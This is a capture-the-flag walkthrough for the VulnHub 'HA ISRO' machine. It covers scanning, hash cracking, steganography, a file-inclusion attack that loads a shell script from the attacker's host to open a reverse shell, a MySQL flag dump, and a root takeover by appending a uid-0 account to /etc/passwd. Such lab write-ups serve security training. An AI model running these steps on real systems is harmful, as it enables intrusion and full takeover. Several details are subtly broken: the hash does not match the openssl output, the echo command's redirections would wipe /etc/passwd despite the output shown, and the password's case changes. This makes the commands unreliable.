HA ISRO (VULNHUB)

Link: https://drive.google.com/file/d/1QgmeUi0GmLESYUdojhE_x4TH9lyAiMuF/view

root@kali:~# nmap -A 192.168.222.151
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-23 15:41 GMT
Nmap scan report for 192.168.222.151
Host is up (0.00025s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:d2:c5:ec:a5:f9:c4:f3:8a:70:f6:df:ac:ad:a9:24 (RSA)
| 256 34:ae:7a:6f:94:93:25:de:39:e3:14:b0:61:80:34:54 (ECDSA)
|_ 256 5e:52:99:70:f4:d1:c0:f6:6e:62:30:94:ee:47:be:59 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: ISRO – Govenment of India
MAC Address: 00:0C:29:7E:97:0D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 192.168.222.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.40 seconds

Now, in the browser:

http://192.168.222.151/

http://192.168.222.151/bhaskara.html

view-source:http://192.168.222.151/bhaskara.html

Output:

Now, on the terminal:

root@kali:~# echo "L2JoYXNrYXJh" | base64 -d
/bhaskara

Try to access this path:

http://192.168.222.151/bhaskara

Save the downloaded file.

root@kali:~# gedit true.py

#!/usr/bin/env python

# TrueCrypt volume import to a format usable by John The Ripper
#
# Written by Alain Espinosa in 2012. No copyright
# is claimed, and the software is hereby placed in the public domain.
# In case this attempt to disclaim copyright and place the software in the
# public domain is deemed null and void, then the software is
# Copyright (c) 2012 Alain Espinosa and it is hereby released to the
# general public under the following terms:
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted.
#
# There's ABSOLUTELY NO WARRANTY, express or implied.
#
# (This is a heavily cut-down "BSD license".)
#
# Ported to Python by Dhiru Kholia, in June of 2015

import sys
from os.path import basename
import binascii

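def process_file(filename, keyfiles):
    """Emit John the Ripper "truecrypt_*" lines for one TrueCrypt container.

    Reads the 512-byte encrypted header at offset 0 (the "normal" volume)
    and, when the file is large enough, the 512-byte header at offset 65536
    (the "hidden" volume). For each header one line per supported hash mode
    (RIPEMD-160, SHA-512, Whirlpool) is written to stdout.

    Args:
        filename: path of the TrueCrypt container.
        keyfiles: list of keyfile paths appended to every output line; may
            be empty.

    Returns:
        None. Problems are reported on stderr and the function returns
        early instead of raising (same best-effort contract as before).
    """
    try:
        f = open(filename, "rb")
    except Exception as e:
        # The format has two %s placeholders, so both values must be passed;
        # the previous single-argument form raised TypeError on this path.
        sys.stderr.write("%s : No truecrypt volume found? %s\n" % (filename, str(e)))
        return

    # 'with' closes the handle on every exit path, including early returns.
    with f:
        header = f.read(512)  # encrypted header of the volume
        if len(header) != 512:
            # write() accepts a single argument; format the message first.
            sys.stderr.write("%s : Truecrypt volume file to short: Need at least 512 bytes\n" % filename)
            return
        _emit_header_lines(filename, header, keyfiles, "normal")

        # try hidden volume if any
        f.seek(65536, 0)
        if f.tell() != 65536:
            return
        header = f.read(512)
        if len(header) != 512:
            return
        _emit_header_lines(filename, header, keyfiles, "hidden")


def _emit_header_lines(filename, header, keyfiles, kind):
    """Write one stdout line per hash mode for a single 512-byte header.

    Args:
        filename: container path; its basename is the login field, the full
            path goes into the trailing field.
        header: the raw 512-byte header.
        keyfiles: keyfile paths; when non-empty their count and names are
            appended after the hex header.
        kind: volume label written after the hash, "normal" or "hidden".
    """
    # hexlify() returns bytes; decoding keeps stdout.write valid on Python 3
    # as well as Python 2.
    hex_header = binascii.hexlify(header).decode("ascii")
    for tag in ["truecrypt_RIPEMD_160", "truecrypt_SHA_512", "truecrypt_WHIRLPOOL"]:
        sys.stdout.write("%s:%s$" % (basename(filename), tag))
        sys.stdout.write(hex_header)
        if keyfiles:
            sys.stdout.write("$%d" % len(keyfiles))
            for keyfile in keyfiles:
                sys.stdout.write("$%s" % keyfile)
        sys.stdout.write(":%s::::%s\n" % (kind, filename))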

if __name__ == "__main__":
    # Command-line entry point: argv[1] is the container, argv[2:] the keyfiles.
    args = sys.argv[1:]
    if not args:
        usage_lines = (
            "Error: No truecrypt volume file specified.\n",
            "\nUtility to import TrueCrypt volume to a format crackeable by John The Ripper\n",
            "\nUsage: %s volume_filename [keyfiles(s)]> output_file\n" % sys.argv[0],
        )
        for text in usage_lines:
            sys.stderr.write(text)
        sys.exit(-1)

    # Every argument after the container path is a keyfile (empty list if none).
    process_file(args[0], args[1:])

Save it.

root@kali:~# python true.py bhaskara > hashes

root@kali:~# john hashes --show

output : xavier

Now open bhaskara with VeraCrypt, enter the recovered password, and we get the flag file.

root@kali:~/Downloads# dirb http://192.168.222.151

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Wed Oct 23 15:52:07 2019
URL_BASE: http://192.168.222.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://192.168.222.151/ —-
==> DIRECTORY: http://192.168.222.151/img/
+ http://192.168.222.151/index.html (CODE:200|SIZE:5859)
+ http://192.168.222.151/server-status (CODE:403|SIZE:280)

—- Entering directory: http://192.168.222.151/img/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—————–
END_TIME: Wed Oct 23 15:52:10 2019
DOWNLOADED: 4612 – FOUND: 2

root@kali:~/Downloads# dirb http://192.168.222.151 -X .php

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Wed Oct 23 15:52:50 2019
URL_BASE: http://192.168.222.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://192.168.222.151/ —-
+ http://192.168.222.151/connect.php (CODE:200|SIZE:0)

—————–
END_TIME: Wed Oct 23 15:52:53 2019
DOWNLOADED: 4612 – FOUND: 1

Now try to access:

http://192.168.222.151/img/

http://192.168.222.151/img/aryabhata.jpg

root@kali:~/Downloads# wget http://192.168.222.151/img/aryabhata.jpg
--2019-10-23 15:54:11-- http://192.168.222.151/img/aryabhata.jpg
Connecting to 192.168.222.151:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 212762 (208K) [image/jpeg]
Saving to: ‘aryabhata.jpg’

aryabhata.jpg 100%[===================================================================>] 207.78K –.-KB/s in 0.001s

2019-10-23 15:54:11 (223 MB/s) – ‘aryabhata.jpg’ saved [212762/212762]

root@kali:~/Downloads# steghide extract -sf aryabhata.jpg
Enter passphrase:
wrote extracted data to "flag.txt".

root@kali:~/Downloads# cat flag.txt
Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation:

The `file` parameter of connect.php includes whatever path it is given; this is confirmed below by reading /etc/passwd through it.

http://192.168.222.151/connect.php?file=/etc/passwd

Output:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin isro:x:1000:1000:isro,,,:/home/isro:/bin/bash sshd:x:106:65534::/run/sshd:/usr/sbin/nologin ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin mysql:x:108:115:MySQL Server,,,:/nonexistent:/bin/false

root@kali:~# gedit shell.php

Save it.

root@kali:~/Downloads# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 …

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

Now, in the browser:

192.168.222.151/connect.php?file=http://192.168.222.132/shell.php

Now, back on the terminal:

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.222.151.
Ncat: Connection from 192.168.222.151:58404.
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
09:01:59 up 21 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN –
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN –
tcp 0 222 192.168.222.151:58404 192.168.222.132:1234 ESTABLISHED 851/sh
tcp6 0 0 :::80 :::* LISTEN –
tcp6 0 0 :::22 :::* LISTEN –
tcp6 0 0 :::65534 :::* LISTEN –
tcp6 0 0 192.168.222.151:80 192.168.222.132:52324 ESTABLISHED –
www-data@ubuntu:/$

www-data@ubuntu:/$ mysql -u root
mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.7.27-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+——————–+
| Database |
+——————–+
| information_schema |
| flag |
| mysql |
| performance_schema |
| sys |
+——————–+
5 rows in set (0.00 sec)

mysql> use flag;
use flag;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+—————-+
| Tables_in_flag |
+—————-+
| flag |
+—————-+
1 row in set (0.00 sec)

mysql> select * from flag;
select * from flag;
+—————————————————-+
| flag |
+—————————————————-+
| Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435} |
+—————————————————-+
1 row in set (0.00 sec)

mysql>

Privilege Escalation:

First check the permissions on /etc/passwd; the output below shows it is world-writable (mode 0777), which is the misconfiguration this step relies on.

www-data@ubuntu:/$ ls -la /etc/passwd
ls -la /etc/passwd
-rwxrwxrwx 1 root root 1455 Oct 3 00:27 /etc/passwd

On another terminal:

root@kali:~/Downloads# openssl passwd -1 -salt user3 pass123
$1$user3$rAGRVf5p2jYTqtqOW5cPu/

www-data@ubuntu:/$ echo ‘raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash’ >>/etc/passwd >/etc/passwd

www-data@ubuntu:/$ tail /etc/passwd
tail /etc/passwd
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
isro:x:1000:1000:isro,,,:/home/isro:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
mysql:x:108:115:MySQL Server,,,:/nonexistent:/bin/false
raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash
www-data@ubuntu:/$ su raj
www-data@ubuntu:/$ su raj

Password: Pass123

root@ubuntu:~# cd /root

root@ubuntu:~# ls

root@ubuntu:~# cat final.txt

@SAKSHAM DIXIT